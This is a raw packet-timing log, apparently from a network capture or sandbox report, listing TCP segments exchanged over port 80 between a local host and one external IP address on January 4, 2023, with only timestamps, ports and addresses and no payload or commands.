Jan 4, 2023 16:47:24.126035929 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.126045942 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.126074076 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.126085997 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.126112938 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.126121044 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.126158953 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.126163960 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.126197100 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.126209974 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.126235962 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.126247883 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.126276016 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.126311064 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.126312971 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.126327038 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.126353979 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.126363039 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.126394033 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.126405001 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.126435041 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.126442909 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.126477003 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.126518011 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.126519918 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.126528025 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.126559019 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.126570940 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.126597881 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.126610041 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.126637936 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.126650095 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.126676083 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.126715899 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.126735926 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.126753092 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.126775026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.126801014 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.126817942 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.126854897 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.126868963 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.146791935 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.146955013 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.147665024 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.147722960 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.147757053 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.147779942 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.147783995 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.147845984 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.147864103 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.147901058 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.147912025 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.147960901 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.147969961 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.148021936 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.148030996 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.148070097 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.148083925 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.148118019 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.148129940 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.148165941 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.148176908 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.148215055 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.148252964 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.148268938 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.148279905 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.148320913 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.148320913 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.148364067 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.148406029 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.148418903 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.148452997 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.148466110 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.148509979 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.148509979 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.148535013 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.148561954 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.148582935 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.148587942 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.148633957 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.148643017 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.148698092 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.148704052 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.148744106 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.148750067 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.148792982 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.148799896 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.148844004 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.148859978 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.148905039 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.148910046 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.148958921 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.148977995 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.149030924 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.151413918 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.151468039 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.151506901 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.151556015 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.151560068 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.151596069 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.151603937 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.151618004 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.151664019 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.151669025 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.151710033 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.151730061 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.151756048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.151770115 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.151807070 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.151808023 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.151853085 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.151859999 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.151902914 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.151904106 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.151952982 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.151953936 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.152000904 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.152008057 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.152049065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.152053118 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.152098894 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.152101040 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.152149916 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.152616978 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.152677059 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.152683020 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.152736902 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.152736902 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.152796984 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.152800083 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.152853966 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.152858019 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.152911901 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.152913094 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.152973890 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.152973890 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.153033018 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.153036118 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.153090954 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.153095007 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.153147936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.153151989 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.153206110 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.153213024 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.153264999 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.153294086 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.153316975 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.153321981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.153372049 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.153376102 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.153417110 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.153424978 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.153460979 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.153464079 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.153512955 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.153516054 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.153568983 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.153568983 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.153624058 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.153660059 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.153680086 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.153682947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.153747082 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.153752089 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.153778076 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.153809071 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.153825045 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.153831005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.153879881 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.153879881 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.153929949 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.153934002 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.153983116 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.153986931 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154036045 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154042006 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154088974 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154093981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154136896 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154140949 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154176950 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154180050 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154218912 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154221058 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154258966 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154259920 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154298067 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154301882 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154337883 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154339075 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154376030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154381037 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154417038 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154422998 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154457092 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154462099 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154495955 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154500008 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154536009 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154537916 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154576063 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154577971 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154616117 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154620886 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154654980 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154656887 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154700041 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154719114 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154762030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154773951 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154803038 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154804945 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154843092 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154849052 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154884100 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154889107 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154925108 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154927969 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.154968023 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.154968977 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.155006886 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.155009985 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.155049086 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.155059099 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.155093908 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.155105114 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.155152082 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.155157089 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.155203104 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.155209064 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.155252934 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.155262947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.155307055 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.155318975 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.155360937 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.155360937 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.155400991 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.155419111 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.155447960 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.155487061 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.155488968 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.155523062 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.155528069 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.155543089 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.155567884 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.155575037 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.155607939 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.155612946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.155648947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.155653000 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.155689955 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.155694008 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.155730009 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.155739069 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.155771017 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.155795097 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.155831099 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.173000097 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.173118114 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.175029039 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.175087929 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.175108910 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.175137043 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.175148010 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.175200939 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.175231934 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.175242901 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.175245047 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.175287008 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.175292969 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.175337076 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.175338030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.175380945 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.175383091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.175431967 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.175448895 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.175476074 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.175478935 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.175525904 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.175527096 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.175570965 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.175580025 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.175611019 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.175632954 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.175656080 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.175662994 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.175705910 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.175712109 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.175755978 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.175760984 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.175807953 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.175812960 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.175859928 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.175864935 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.175909996 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.175918102 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.175961018 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.175972939 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.176031113 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.176035881 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.176080942 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.176085949 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.176130056 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.176145077 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.176175117 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.176189899 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.176218987 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.176227093 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.176273108 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.177921057 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.177999973 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.178036928 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.178083897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.178086042 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.178112030 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.178127050 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.178163052 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.178164005 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.178191900 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.178198099 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.178215981 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.178231955 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.178267002 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.178299904 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.178309917 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.178309917 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.178334951 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.178353071 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.178369999 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.178383112 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.178404093 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.178416967 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.178438902 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.178468943 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.178503036 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.181607008 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.181653976 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.181690931 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.181729078 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.181737900 CET	80	49695	109.107.173.210	192.168.2.4
